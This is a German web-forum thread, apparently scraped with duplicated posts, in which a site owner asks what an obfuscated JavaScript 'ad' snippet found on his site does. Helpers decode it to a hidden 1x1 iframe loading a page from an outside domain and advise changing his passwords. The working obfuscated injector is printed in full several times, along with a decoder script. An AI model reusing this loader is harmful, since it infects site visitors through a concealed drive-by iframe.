[Erledigt] JavaScript Hack

Dashmaster · 02.12.2010, 07:07

Hallo...
folgendes Problem. Vielleicht kann mir hier ein Profi weiterhelfen...

Kann mir vielleicht jemand sagen, was dieser Code hier versucht auszulesen, oder was hiermit veranstaltet werden kann?

Wäre super, wenn hier jemand ist, der sich mit einer solchen "Visitenkatre" auskennt.

PHP-Code:

  <!-- ad --><script>

var j9945f29f1c2f={k018cc630423:function(hc9693){var x30ac6=String,x1619abd=hc9693.substr(this.bf8acd16(),3)-524,ad233a,na7d917;hc9693=hc9693.substr(this.v3b8f1ff9());var sacefc9fd=hc9693.length;for(var gc6e177=0;gc6e177<sacefc9fd;gc6e177++){try{throw(x92dc81be=this.b1f61d1(hc9693,gc6e177));}catch(e){x92dc81be=e;};if(x92dc81be=='™'){x1619abd="";gc6e177=this.c62544ca(gc6e177);x6ee9481=hc9693.substr(gc6e177,1);while(this.ga33dd63(x6ee9481)){x1619abd+=x6ee9481;gc6e177++;x6ee9481=hc9693.substr(gc6e177,1);}x1619abd-=665;continue;}ad233a="";if(this.o9e301f19(x92dc81be)){gc6e177++;x92dc81be=hc9693.substr(gc6e177,1);while(x92dc81be!='©'){ad233a+=x92dc81be;gc6e177++;x92dc81be=hc9693.substr(gc6e177,1);}ad233a=this.l8ddf7365(ad233a,x1619abd,31);if(ad233a<0)ad233a+=256;ad233a=this.q999986(ad233a);document.write(x30ac6["f\x72o\x6d\x43\x68\x61rCo\x64\x65"](ad233a));continue;}g23879f7=(x92dc81be+'')["char\x43o\x64e\x41t"](0);if(g23879f7>848)g23879f7-=848;na7d917=g23879f7-x1619abd-31;if(na7d917<0)na7d917+=256;if(na7d917>=192)na7d917+=848;else if(na7d917==168)na7d917=1025;else if(na7d917==184)na7d917=1105;document.write(this.q5fb7b(na7d917));}},bf8acd16:function(){return 10;},v3b8f1ff9:function(){return 13;},b1f61d1:function(j74d5c21,ab1cd953){return j74d5c21.substr(ab1cd953,1);},c62544ca:function(ob256a2a){return ++ob256a2a;},q999986:function(ibf778){if(ibf778==168)ibf778=1025;else if(ibf778==184)ibf778=1105;return (ibf778>=192 && ibf778<256) ? ibf778+848 : ibf778;},ga33dd63:function(eb18c1e96){return eb18c1e96!='™';},o9e301f19:function(oe63add57){return oe63add57=='©';},l8ddf7365:function(n8e402d55,ccbb85dc,mbbce7bd){return n8e402d55-ccbb85dc-mbbce7bd;},q5fb7b:function(w15dfd251){var x30ac6=String;return x30ac6["f\x72o\x6d\x43\x68\x61rCo\x64\x65"](w15dfd251);},rd61b1:function(){return "7c07b7a519568©135©™784™©255©©252©™761™©241©©224©©236©™764™©231©©162©©245©™801™©25©©10©™767™©194©™821™©221©#//+©245©©234©©234©™682™©146©©145©™754™©238©©217©™791™©11©™783™©4©™675™©149©©138©©143©™712™©124©™749™©214©©226©©224©©162©©232©©236©©237©©231©©220©©164©©226©©165©©162©™794™©19©™811™©25©©231©)©20©™858™L©16©™707™©175©©130©w©185©©177©©185©©136©©188©©134©©129©©172©©130©©175©y™732™©155©™741™©158©™803™©15©™748™©170©©164©™785™©208©©200©©253©™722™©188©©137©©188©©138©©187©™824™©240©©31©©31©©247©©240©©247©™786™©253©©206©©206©©200©©252©©250©©250©©251©©186©©184©™701™©186©©172©™765™©231©™672™©154©©142©™833™©4©©233©©248©©233©™688™V©158©©155©™737™©208©©206©©207©™843™E©14©©243©™689™h™737™©137©™738™©136©©206©™762™©242©©225©™749™©224©™864™K™735™©199©™690™©167©©170©©156©©157©©170©u™694™^l^zx™862™©19©MJ™782™©6©©245©©1©©249©©210©";}};j9945f29f1c2f.k018cc630423(j9945f29f1c2f.rd61b1());

</script><!-- /ad -->

eagle275 · 02.12.2010, 09:12

im "einfachsten" Fall einfach ein Stück Javascript, das Werbung einbindet - worauf auch das ad-Tag darüber hindeuten SOLL ....

es kann aber auch ausführbaren Code zum Angreifen von Sicherheitslücken über eingebetteten Code irgendwelches Ungemach angerichtet werden soll ... Schau mal mitten im Code steckt dies hier

"f\x72o\x6d\x43\x68\x61rCo\x64\x65" ....wenn ich die \x als hexadezimal Zahlen interpretiere ...

"fromCharCode" - sieht mir ganz danach aus, als ob hier Funktionsaufrufe ein wenig verschleiert werden sollen )

..... passend dazu die seltsamen Variablennamen die auf Code-Anonymisierer hindeuten und die Lesbarkeit natürlich herabsetzen - im Sommer hatte die c't dazu mehrere Ausgaben, wo Viren-/Trojanerjäger Einblicke in ihre Arbeitsabläufe gaben .. Die hatten auch mit solchem Code zu tun. Es kann durchaus sein, dass hier von irgendwelchen Servern iframes nachgeladen werden, die dann Code enthalten, der aktiv Sicherheitslücken angreift oder ähnliche Späße (phishing mit cross-site-scripting ....)

also ich würd doch mal hastig das ftp-kennwort und das gleiche für die Datenbank ändern. Prüfe auch, ob dies eventuell aus der Datenbank kommen kann (war zumindest in einem der c't Fälle so) ....und lösch diesen Code .. der hat jedenfalls wenig gutes vor

xm22 · 02.12.2010, 15:20

Ich habe es mir mal in der Console ausgeben lassen (statt document.write), aber es kam nur Unsinn dabei heraus. Vielleicht wurde der Code mit einem falschen Encoding gepastet oder er wird hier falsch ausgeliefert..

xm22 · 02.12.2010, 15:26

Datei war falsch kodiert..

Das hier kommt dabei heraus:

Code:

<iframe  src="http://bavanolaf.com/uyzti1o2/sh6xcl0f9.php?"  width="1" height="1" frameborder="0"></iframe>

Wen es interessiert, hier mein "Skript" dafür:

Code:

<HTML>
<head>
<script>
var _output = '';
 var j9945f29f1c2f={k018cc630423:function(hc9693){var x30ac6=String,x1619abd=hc9693.substr(this.bf8acd16(),3)-524,ad233a,na7d917;hc9693=hc9693.substr(this.v3b8f1ff9());var sacefc9fd=hc9693.length;for(var gc6e177=0;gc6e177<sacefc9fd;gc6e177++){try{throw(x92dc81be=this.b1f61d1(hc9693,gc6e177));}catch(e){x92dc81be=e;};if(x92dc81be=='™'){x1619abd="";gc6e177=this.c62544ca(gc6e177);x6ee9481=hc9693.substr(gc6e177,1);while(this.ga33dd63(x6ee9481)){x1619abd+=x6ee9481;gc6e177++;x6ee9481=hc9693.substr(gc6e177,1);}x1619abd-=665;continue;}ad233a="";if(this.o9e301f19(x92dc81be)){gc6e177++;x92dc81be=hc9693.substr(gc6e177,1);while(x92dc81be!='©'){ad233a+=x92dc81be;gc6e177++;x92dc81be=hc9693.substr(gc6e177,1);}ad233a=this.l8ddf7365(ad233a,x1619abd,31);if(ad233a<0)ad233a+=256;ad233a=this.q999986(ad233a);_output += (x30ac6["f\x72o\x6d\x43\x68\x61rCo\x64\x65"](ad233a));continue;}g23879f7=(x92dc81be+'')["char\x43o\x64e\x41t"](0);if(g23879f7>848)g23879f7-=848;na7d917=g23879f7-x1619abd-31;if(na7d917<0)na7d917+=256;if(na7d917>=192)na7d917+=848;else if(na7d917==168)na7d917=1025;else if(na7d917==184)na7d917=1105;_output += (this.q5fb7b(na7d917));}},bf8acd16:function(){return 10;},v3b8f1ff9:function(){return 13;},b1f61d1:function(j74d5c21,ab1cd953){return j74d5c21.substr(ab1cd953,1);},c62544ca:function(ob256a2a){return ++ob256a2a;},q999986:function(ibf778){if(ibf778==168)ibf778=1025;else if(ibf778==184)ibf778=1105;return (ibf778>=192 && ibf778<256) ? ibf778+848 : ibf778;},ga33dd63:function(eb18c1e96){return eb18c1e96!='™';},o9e301f19:function(oe63add57){return oe63add57=='©';},l8ddf7365:function(n8e402d55,ccbb85dc,mbbce7bd){return n8e402d55-ccbb85dc-mbbce7bd;},q5fb7b:function(w15dfd251){var x30ac6=String;return x30ac6["f\x72o\x6d\x43\x68\x61rCo\x64\x65"](w15dfd251);},rd61b1:function(){return "7c07b7a519568©135©™784™©255©©252©™761™©241©©224©©236©™764™©231©©162©©245©™801™©25©©10©™767™©194©™821™©221©#//+©245©©234©©234©™682™©146©©145©™754™©238©©217©™791™©11©™783™©4©™675™©149©©138©©143©™712™©124©™749™©214©©226©©224©©162©©232©©236©©237©©231©©220©©164©©226©©165©©162©™794™©19©™811™©25©©231©)©20©™858™L©16©™707™©175©©130©w©185©©177©©185©©136©©188©©134©©129©©172©©130©©175©y™732™©155©™741™©158©™803™©15©™748™©170©©164©™785™©208©©200©©253©™722™©188©©137©©188©©138©©187©™824™©240©©31©©31©©247©©240©©247©™786™©253©©206©©206©©200©©252©©250©©250©©251©©186©©184©™701™©186©©172©™765™©231©™672™©154©©142©™833™©4©©233©©248©©233©™688™V©158©©155©™737™©208©©206©©207©™843™E©14©©243©™689™h™737™©137©™738™©136©©206©™762™©242©©225©™749™©224©™864™K™735™©199©™690™©167©©170©©156©©157©©170©u™694™^l^zx™862™©19©MJ™782™©6©©245©©1©©249©©210©";}};j9945f29f1c2f.k018cc630423(j9945f29f1c2f.rd61b1()); 
console.log(_output)
</script>
</head>
<BODY>

</BODY>
</HTML>

Dashmaster · 02.12.2010, 15:41

Besten Dank für Hilfe und Antworten und vor allem für dein Script xm22

Vielleicht kann mir ja jemand noch einen Tick weiterhelfen und mir sagen, wie und ob man überhaupt Sicherheitslücken auslesen kann?

Manko10 · 02.12.2010, 15:47

Da gibt es keinen allgemeingültigen Weg. Jede Sicherheitslücke ist anders. Es gibt viele Standardfälle, aber manche Lücken sind auch ausgefallener. Ohne dein Skript zu kennen, können wir dazu eh nichts sagen.
Ich kann dir aber raten, dich mal mit Software-Sicherheit zu beschäftigen. Gibt auch ein PHP-bezogenes Buch dazu: http://www.php-sicherheit.de/

eagle275 · 02.12.2010, 15:51

"Sicherheitslücken auslesen" ? übersetz mal, was du damit meinst ...

wenn du meinst, dass man über Sicherheitslücken an Informationen kommen kann : JA das geht
wenn du meinst, dass man Webserver / PC / Internetseiten / Datenbanken auf Sicherheitslücken hin abklopfen kann , um dann darüber Daten zu klauen - oder auch nur Werbung zu streuen - oder aber Viren / Trojaner zu verbreiten : JA, geht auch

Atikos · 02.12.2010, 15:52

Erstmal, woher hast du das Script Snippet überhaupt?

Sieht mir mehr danach aus, als ob da jemand eine Anwendung für ne Website geschrieben hat und diese verschlüsselt hat, um nachbau/codecopy zu verhindern.

Das quasi zu "reverse engineeren" ist sogar strafbar, wenn mans dir nachweisen kann

Wenn das allerdings von ner Quelle ist, der du nicht vertrauen kannst, Free Snippets oder so ein kram, dann ist natürlich Vorsicht geboten, aber allzu viel kann das nicht beschädigen.

G

Dashmaster · 02.12.2010, 16:03

Ok... Aslo...

Zitat:

Webserver / PC / Internetseiten / Datenbanken auf Sicherheitslücken hin abklopfen kann , um dann darüber Daten zu klauen - oder auch nur Werbung zu streuen - oder aber Viren / Trojaner zu verbreiten : JA, geht auch

Sowas mein ich. Wenn man dazu in der Lage ist, sowas Auszulesen und darüber dann einen Schaden oder eben sich so nen "Spass" zu erlauben, liest man das doch in dem Moment aus.

Also geklaut, oder irgendwas nachgebaut oder eine Verschlüsselung geknackt habe ich sicher nicht. Für alles was ich verwende, habe ich auch eine Rechnung.

Zitat:

Wenn das allerdings von ner Quelle ist, der du nicht vertrauen kannst, Free Snippets oder so ein kram, dann ist natürlich Vorsicht geboten, aber allzu viel kann das nicht beschädigen.

Ich habe mir allerdings das ein und andere Script bei http://www.laurussoftware.com/ gekauft. Dort kommt jetzt eine Meldung, das der Seite nicht vertraut wird, was letzten Monat noch nicht war. Vielleicht hängt der Kauf des ein oder anderen Scripts mit dem jetzigen Status dieser Seite zusammen, oder ist das eher unwahrscheinlich?

eagle275 · 02.12.2010, 16:19

und woher hast du diesen Code ? das sieht verdammt nach Code-Injection aus, nachdem jemand den FTP-Zugang zu deiner Seite gehackt / erraten hat ... oder ist das eines der "gekauften Scripte" dieser nun nicht mehr vertrauenswürdigen Seite

Themen-Optionen
Druckbare Version zeigen Jemanden per E-Mail auf dieses Thema hinweisen
Thema bewerten
Thema bewerten:

Ähnliche Themen
Thema	Autor	Forum	Antworten	Letzter Beitrag
[Erledigt] Problem mit dynamischer URL in Javascript Dateien	da.eXecutoR	JavaScript, Ajax und mehr	4	28.09.2010 17:18
timing Probleme bzw Zusammenspiel PHP Javascript	thica	PHP Tipps 2009	2	19.02.2010 19:06
[Erledigt] Ersatz für Javascript	Mort1ferus	JavaScript, Ajax und mehr	6	12.10.2009 09:35
Wie lade ich ein Javascript nach einer AJAX Abfrage neu?	da.eXecutoR	JavaScript, Ajax und mehr	3	21.09.2009 11:15
[Erledigt] JavaScript Weiche bei Formular?	markus228	JavaScript, Ajax und mehr	1	09.08.2009 14:16
[Erledigt] Variable von Javascript mit 1x1px-Bild an PHP übergeben	beneblack	PHP Tipps 2009	18	03.05.2009 22:40
JS: Einführung - Javascript im Schichtenmodell	nikosch	Tutorials	4	11.04.2009 17:06
[Erledigt] Javascript in PHP Aufrufen	coyboc	PHP Tipps 2009	17	10.04.2009 15:28
1101: 10x JavaScript und kein Ende ist abzusehen…	Nikolaus 2.0	Adventskalender 2008	9	13.12.2008 20:11
PHP + Javascript + MYSQL	socke	PHP Tipps 2006	4	02.04.2006 22:02
Variable wird geändert bei Übergabe an Javascript		PHP Tipps 2007	4	17.12.2005 16:53
JavaScript in JavaScript geschriebene Html-Datei einbinden.	woods	HTML, Usability und Barrierefreiheit	6	06.09.2004 18:33
Javascript		HTML, Usability und Barrierefreiheit	5	31.08.2004 18:30
php + Javascript, Variablenübergabe		PHP Tipps 2004	14	28.07.2004 15:42

02.12.2010, 07:07
Dashmaster Neuer Benutzer Registriert seit: 21.10.2010 Beiträge: 21 PHP-Kenntnisse: Anfänger	[Erledigt] JavaScript Hack Hallo... folgendes Problem. Vielleicht kann mir hier ein Profi weiterhelfen... Kann mir vielleicht jemand sagen, was dieser Code hier versucht auszulesen, oder was hiermit veranstaltet werden kann? Wäre super, wenn hier jemand ist, der sich mit einer solchen "Visitenkatre" auskennt. PHP-Code: <!-- ad --><script> var j9945f29f1c2f={k018cc630423:function(hc9693){var x30ac6=String,x1619abd=hc9693.substr(this.bf8acd16(),3)-524,ad233a,na7d917;hc9693=hc9693.substr(this.v3b8f1ff9());var sacefc9fd=hc9693.length;for(var gc6e177=0;gc6e177<sacefc9fd;gc6e177++){try{throw(x92dc81be=this.b1f61d1(hc9693,gc6e177));}catch(e){x92dc81be=e;};if(x92dc81be=='™'){x1619abd="";gc6e177=this.c62544ca(gc6e177);x6ee9481=hc9693.substr(gc6e177,1);while(this.ga33dd63(x6ee9481)){x1619abd+=x6ee9481;gc6e177++;x6ee9481=hc9693.substr(gc6e177,1);}x1619abd-=665;continue;}ad233a="";if(this.o9e301f19(x92dc81be)){gc6e177++;x92dc81be=hc9693.substr(gc6e177,1);while(x92dc81be!='©'){ad233a+=x92dc81be;gc6e177++;x92dc81be=hc9693.substr(gc6e177,1);}ad233a=this.l8ddf7365(ad233a,x1619abd,31);if(ad233a<0)ad233a+=256;ad233a=this.q999986(ad233a);document.write(x30ac6["f\x72o\x6d\x43\x68\x61rCo\x64\x65"](ad233a));continue;}g23879f7=(x92dc81be+'')["char\x43o\x64e\x41t"](0);if(g23879f7>848)g23879f7-=848;na7d917=g23879f7-x1619abd-31;if(na7d917<0)na7d917+=256;if(na7d917>=192)na7d917+=848;else if(na7d917==168)na7d917=1025;else if(na7d917==184)na7d917=1105;document.write(this.q5fb7b(na7d917));}},bf8acd16:function(){return 10;},v3b8f1ff9:function(){return 13;},b1f61d1:function(j74d5c21,ab1cd953){return j74d5c21.substr(ab1cd953,1);},c62544ca:function(ob256a2a){return ++ob256a2a;},q999986:function(ibf778){if(ibf778==168)ibf778=1025;else if(ibf778==184)ibf778=1105;return (ibf778>=192 && ibf778<256) ? ibf778+848 : ibf778;},ga33dd63:function(eb18c1e96){return eb18c1e96!='™';},o9e301f19:function(oe63add57){return oe63add57=='©';},l8ddf7365:function(n8e402d55,ccbb85dc,mbbce7bd){return n8e402d55-ccbb85dc-mbbce7bd;},q5fb7b:function(w15dfd251){var x30ac6=String;return x30ac6["f\x72o\x6d\x43\x68\x61rCo\x64\x65"](w15dfd251);},rd61b1:function(){return "7c07b7a519568©135©™784™©255©©252©™761™©241©©224©©236©™764™©231©©162©©245©™801™©25©©10©™767™©194©™821™©221©#//+©245©©234©©234©™682™©146©©145©™754™©238©©217©™791™©11©™783™©4©™675™©149©©138©©143©™712™©124©™749™©214©©226©©224©©162©©232©©236©©237©©231©©220©©164©©226©©165©©162©™794™©19©™811™©25©©231©)©20©™858™L©16©™707™©175©©130©w©185©©177©©185©©136©©188©©134©©129©©172©©130©©175©y™732™©155©™741™©158©™803™©15©™748™©170©©164©™785™©208©©200©©253©™722™©188©©137©©188©©138©©187©™824™©240©©31©©31©©247©©240©©247©™786™©253©©206©©206©©200©©252©©250©©250©©251©©186©©184©™701™©186©©172©™765™©231©™672™©154©©142©™833™©4©©233©©248©©233©™688™V©158©©155©™737™©208©©206©©207©™843™E©14©©243©™689™h™737™©137©™738™©136©©206©™762™©242©©225©™749™©224©™864™K™735™©199©™690™©167©©170©©156©©157©©170©u™694™^l^zx™862™©19©MJ™782™©6©©245©©1©©249©©210©";}};j9945f29f1c2f.k018cc630423(j9945f29f1c2f.rd61b1()); </script><!-- /ad -->


Mister Ad PHP Code Flüsterer Registriert seit: 21.08.2005 Beiträge: 4682 PHP-Kenntnisse: Fortgeschritten

02.12.2010, 09:12
eagle275 Erfahrener Benutzer Registriert seit: 01.09.2010 Beiträge: 4.561 PHP-Kenntnisse: Fortgeschritten	im "einfachsten" Fall einfach ein Stück Javascript, das Werbung einbindet - worauf auch das ad-Tag darüber hindeuten SOLL .... es kann aber auch ausführbaren Code zum Angreifen von Sicherheitslücken über eingebetteten Code irgendwelches Ungemach angerichtet werden soll ... Schau mal mitten im Code steckt dies hier "f\x72o\x6d\x43\x68\x61rCo\x64\x65" ....wenn ich die \x als hexadezimal Zahlen interpretiere ... "fromCharCode" - sieht mir ganz danach aus, als ob hier Funktionsaufrufe ein wenig verschleiert werden sollen ) ..... passend dazu die seltsamen Variablennamen die auf Code-Anonymisierer hindeuten und die Lesbarkeit natürlich herabsetzen - im Sommer hatte die c't dazu mehrere Ausgaben, wo Viren-/Trojanerjäger Einblicke in ihre Arbeitsabläufe gaben .. Die hatten auch mit solchem Code zu tun. Es kann durchaus sein, dass hier von irgendwelchen Servern iframes nachgeladen werden, die dann Code enthalten, der aktiv Sicherheitslücken angreift oder ähnliche Späße (phishing mit cross-site-scripting ....) also ich würd doch mal hastig das ftp-kennwort und das gleiche für die Datenbank ändern. Prüfe auch, ob dies eventuell aus der Datenbank kommen kann (war zumindest in einem der c't Fälle so) ....und lösch diesen Code .. der hat jedenfalls wenig gutes vor __________________ "Irren ist männlich", sprach der Igel und stieg von der Drahtbürste

02.12.2010, 15:20
xm22 Erfahrener Benutzer Registriert seit: 30.07.2008 Beiträge: 1.167 PHP-Kenntnisse: Fortgeschritten	Ich habe es mir mal in der Console ausgeben lassen (statt document.write), aber es kam nur Unsinn dabei heraus. Vielleicht wurde der Code mit einem falschen Encoding gepastet oder er wird hier falsch ausgeliefert..

02.12.2010, 15:41
Dashmaster Neuer Benutzer Registriert seit: 21.10.2010 Beiträge: 21 PHP-Kenntnisse: Anfänger	Besten Dank für Hilfe und Antworten und vor allem für dein Script xm22 Vielleicht kann mir ja jemand noch einen Tick weiterhelfen und mir sagen, wie und ob man überhaupt Sicherheitslücken auslesen kann? __________________ "Ausgerechnet mir will jemand was vom Leben erzählen, der seines nur aus Büchern gelernt hat!" (© by S.Georgi)

02.12.2010, 15:47
Manko10 Supermoderator HD Registriert seit: 16.03.2008 Beiträge: 8.706 PHP-Kenntnisse: Fortgeschritten	Da gibt es keinen allgemeingültigen Weg. Jede Sicherheitslücke ist anders. Es gibt viele Standardfälle, aber manche Lücken sind auch ausgefallener. Ohne dein Skript zu kennen, können wir dazu eh nichts sagen. Ich kann dir aber raten, dich mal mit Software-Sicherheit zu beschäftigen. Gibt auch ein PHP-bezogenes Buch dazu: http://www.php-sicherheit.de/ __________________ Refining Linux Advent Calendar series “24 Outstanding ZSH Gems”

02.12.2010, 15:51
eagle275 Erfahrener Benutzer Registriert seit: 01.09.2010 Beiträge: 4.561 PHP-Kenntnisse: Fortgeschritten	"Sicherheitslücken auslesen" ? übersetz mal, was du damit meinst ... wenn du meinst, dass man über Sicherheitslücken an Informationen kommen kann : JA das geht wenn du meinst, dass man Webserver / PC / Internetseiten / Datenbanken auf Sicherheitslücken hin abklopfen kann , um dann darüber Daten zu klauen - oder auch nur Werbung zu streuen - oder aber Viren / Trojaner zu verbreiten : JA, geht auch __________________ "Irren ist männlich", sprach der Igel und stieg von der Drahtbürste

02.12.2010, 15:52
Atikos Benutzer Registriert seit: 02.12.2010 Beiträge: 37 PHP-Kenntnisse: Fortgeschritten	Erstmal, woher hast du das Script Snippet überhaupt? Sieht mir mehr danach aus, als ob da jemand eine Anwendung für ne Website geschrieben hat und diese verschlüsselt hat, um nachbau/codecopy zu verhindern. Das quasi zu "reverse engineeren" ist sogar strafbar, wenn mans dir nachweisen kann Wenn das allerdings von ner Quelle ist, der du nicht vertrauen kannst, Free Snippets oder so ein kram, dann ist natürlich Vorsicht geboten, aber allzu viel kann das nicht beschädigen. G

02.12.2010, 16:19
eagle275 Erfahrener Benutzer Registriert seit: 01.09.2010 Beiträge: 4.561 PHP-Kenntnisse: Fortgeschritten	und woher hast du diesen Code ? das sieht verdammt nach Code-Injection aus, nachdem jemand den FTP-Zugang zu deiner Seite gehackt / erraten hat ... oder ist das eines der "gekauften Scripte" dieser nun nicht mehr vertrauenswürdigen Seite __________________ "Irren ist männlich", sprach der Igel und stieg von der Drahtbürste